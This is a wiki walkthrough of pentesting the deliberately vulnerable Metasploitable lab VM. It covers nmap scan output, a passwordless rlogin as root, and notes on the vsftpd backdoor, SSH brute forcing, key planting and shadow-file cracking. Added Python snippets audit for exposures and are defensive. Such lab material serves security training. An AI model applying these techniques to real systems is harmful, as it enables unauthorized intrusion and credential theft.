From charlesreid1

Metasploitable is a VirtualBox virtual machine for pentesting practice.

Services

For reference, a list of services running on the metasploitable machine:

Services
========

host       port  proto  name         state  info
----       ----  -----  ----         -----  ----
10.0.0.27  21    tcp    ftp          open   vsftpd 2.3.4
10.0.0.27  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
10.0.0.27  23    tcp    telnet       open   Linux telnetd
10.0.0.27  25    tcp    smtp         open   Postfix smtpd
10.0.0.27  53    tcp    domain       open   ISC BIND 9.4.2
10.0.0.27  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
10.0.0.27  111   tcp    rpcbind      open   2 RPC #100000
10.0.0.27  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
10.0.0.27  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
10.0.0.27  512   tcp    exec         open   netkit-rsh rexecd
10.0.0.27  513   tcp    login        open
10.0.0.27  514   tcp    tcpwrapped   open
10.0.0.27  1099  tcp    java-rmi     open   Java RMI Registry
10.0.0.27  1524  tcp    shell        open   Metasploitable root shell
10.0.0.27  2049  tcp    nfs          open   2-4 RPC #100003
10.0.0.27  2121  tcp    ftp          open   ProFTPD 1.3.1
10.0.0.27  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
10.0.0.27  3632  tcp                 open
10.0.0.27  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
10.0.0.27  5900  tcp    vnc          open   VNC protocol 3.3
10.0.0.27  6000  tcp    x11          open   access denied
10.0.0.27  6667  tcp    irc          open   Unreal ircd
10.0.0.27  6697  tcp                 open
10.0.0.27  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
10.0.0.27  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1
10.0.0.27  8787  tcp                 open


Recon

Make a box for stuff:

$ mkdir -p box/metasploitable

Start by using nmap to scan the host.

First a fast scan -F:

$ nmap -F 10.0.0.*

Then we can do a more extensive scan:

$ nmap -sS 10.0.0.*

This reveals the IP address of the VirtualBox VM, which is 10.0.0.27.

We can also do a deeper scan:

$ nmap -sS -sV -A 10.0.0.27

This will reveal an array of services, some of which may be exploitable using metasploit.

Sure enough, the verbose scan returns lots of good information:

$ nmap -sS -sV -A 10.0.0.27

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-22 18:30 PDT
Nmap scan report for 10.0.0.27
Host is up (0.016s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2016-03-23T01:31:31+00:00; +33s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      42810/tcp  mountd
|   100005  1,2,3      45599/udp  mountd
|   100021  1,3,4      34385/tcp  nlockmgr
|   100021  1,3,4      60702/udp  nlockmgr
|   100024  1          38085/udp  status
|_  100024  1          52004/tcp  status
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    Java RMI Registry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression
|   Status: Autocommit
|_  Salt: w$K,8vk7k8tagd@PR*zK
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 1:05:20
|   source ident: nmap
|   source host: 6D4CD63B.D3975B40.7B559A54.IP
|_  error: Closing Link: cxfhgnbdt[10.0.0.25] (Quit: cxfhgnbdt)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2016-03-22T21:31:31-04:00

TRACEROUTE
HOP RTT      ADDRESS
1   16.11 ms 10.0.0.27

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds
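As an added example (not part of this wiki page), a small Python parser that turns nmap's normal output, like the listing above, into an inventory of the kind shown in the Services table at the top, and then flags the exposures a defender would fix first: cleartext or host-trust remote access and anonymous FTP. The sample lines are copied from the scan above; the port-to-reason table is my own choice, not something nmap emits.

```python
import re

# Constructed sample: a handful of port and NSE script lines taken from the
# nmap -sS -sV -A output shown on this page.
SAMPLE_NMAP = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
"""

# port/proto, state, service name, optional version string
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

def parse_nmap_ports(text):
    """Parse nmap normal output into service dicts.
    NSE '|' lines attach to the preceding port; a trailing '?' (guess) is dropped."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, name, info = m.groups()
            services.append({"port": int(port), "proto": proto, "state": state,
                             "name": name.rstrip("?"), "info": (info or "").strip(),
                             "scripts": []})
        elif line.startswith("|") and services:
            services[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return services

# What a defender flags first: cleartext or host-trust-based remote access
# (telnet, the Berkeley r-services) and anything reachable without credentials.
LEGACY_PORTS = {23: "telnet (cleartext)", 512: "rexec", 513: "rlogin", 514: "rsh"}

def flag_exposures(services):
    """Return (port, reason) pairs for open services that should not be exposed."""
    flags = []
    for s in services:
        if s["state"] != "open":
            continue
        if s["port"] in LEGACY_PORTS:
            flags.append((s["port"], LEGACY_PORTS[s["port"]]))
        for script in s["scripts"]:
            if script.startswith("ftp-anon:") and "allowed" in script:
                flags.append((s["port"], "anonymous FTP login allowed"))
    return flags
```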

MySQL

See MSF/MySQL for the MySQL exploits using Metasploit framework.

PostgreSQL

One of the services running on Metasploitable is PostgreSQL (a.k.a. postgres), so let's continue with the SQL theme:

5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7

Metasploitable/Postgres

Rlogin

This one is trivial: ports 512, 513, and 514 are open for the "r" services (rexec, rlogin, rsh). The service has been misconfigured to allow remote logins from any host.

All you need to do is ask nicely for root!

First, make sure rsh-client is installed, otherwise it will revert to SSH and ask for a password:

# apt-get install rsh-client

Now ask nicely for root:

# rlogin -l root 10.0.0.27
Last login: Tue Mar 22 20:26:16 EDT 2016 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# 

This machine is now totally compromised!
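The misconfiguration behind this is a wildcard entry in the files the r-services consult for host trust. As an added example (not from this wiki page), a Python check that finds such entries; the file paths are the conventional ones and are assumed here, and the sample contents are constructed:

```python
from pathlib import Path

# Files the Berkeley r-services (rlogind, rshd) consult for host trust:
# /etc/hosts.equiv is system-wide, ~/.rhosts is per user. These are the
# conventional paths and an assumption here; the page does not name them.
RHOSTS_CANDIDATES = ["/etc/hosts.equiv", "/root/.rhosts"]

# Constructed samples, not taken from the Metasploitable image.
SAMPLE_BAD = "# trust everyone\n+ +\n"
SAMPLE_OK = "admin-host.example.test alice\n"

def rhosts_wildcards(text):
    """Return the lines of a hosts.equiv/.rhosts file that trust any host.

    Each non-comment line is 'host [user]'. A bare '+' in either field is a
    wildcard, so '+ +' trusts every user on every host, which is what lets
    `rlogin -l root` succeed without a password.
    """
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        if fields[0] == "+" or (len(fields) > 1 and fields[1] == "+"):
            hits.append(line.strip())
    return hits

def audit_rhosts(paths=RHOSTS_CANDIDATES):
    """Map each readable trust file to its wildcard lines (empty list = clean)."""
    report = {}
    for p in paths:
        path = Path(p)
        if path.is_file():
            report[p] = rhosts_wildcards(path.read_text(errors="replace"))
    return report
```

Run `audit_rhosts()` as root on the target host; any non-empty list in the report is a file to fix, and on a hardened system the r-services should simply not be running at all.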

VSFTP

The particular version of vsftpd that is running on Metasploitable contains a malicious backdoor that was slipped into the source code. If the username ends in a smiley face, :), the FTP server opens a listening shell on port 6200.

Metasploitable/VSFTP

SSH

There are several ways to get into a machine using SSH.

SSH Brute Force

(The caveman approach)

The first is to attempt to log in by brute force, using a tool like hydra. This is extremely slow, and it requires a list of users on the remote machine, which might come, for example, from /etc/passwd. That list lets you brute-force passwords for some or all users. But if you have access to /etc/passwd, you probably also have access to /etc/shadow, and the two can be fed to John the Ripper, which cracks login passwords much, much faster than hydra's online guessing.

Metasploitable/SSH/Brute Force

SSH Keys

Alternatively, if you have WRITE access to the filesystem through an exploit such as the rlogin trick above, a PHP shell introduced through a web app vulnerability, or a netcat payload, you can generate an SSH key pair on the attacker machine and add its public key to the remote user's list of authorized keys. This lets you log in without a password. Because the method requires WRITE access to the filesystem, it has to be coupled with an NFS or other remote shell exploit.

Metasploitable/SSH/Keys

SSH Exploits

Old or unpatched versions of SSH, or weak cryptographic settings, can also be exploited.

More info at Metasploitable/SSH/Exploits

Shadow File

John the Ripper

You can use the /etc/passwd and /etc/shadow files to crack passwords on a Unix system. First combine the two with John the Ripper's unshadow tool, then run John against the result to guess the passwords.

General notes about cracking /etc/shadow with John: John the Ripper/Shadow File

Metasploitable-specific notes: Metasploitable/John Shadow File

Network File System

(Also see Linux/File Server page for general notes on NFS in Linux.)

Metasploitable/NFS

DNS Bind

The BIND DNS server running on port 53 can be poisoned using Metasploit. This takes some care to execute, even locally.

Metasploitable/DNS Bind

Apache

Attacking Apache with Metasploit: Metasploitable/Apache

Attacking Apache with Python: Metasploitable/Apache/Python

Tor's Hammer: Metasploitable/TorsHammer

WebDAV

Abusing WebDAV: Metasploitable/Apache/DAV

Flags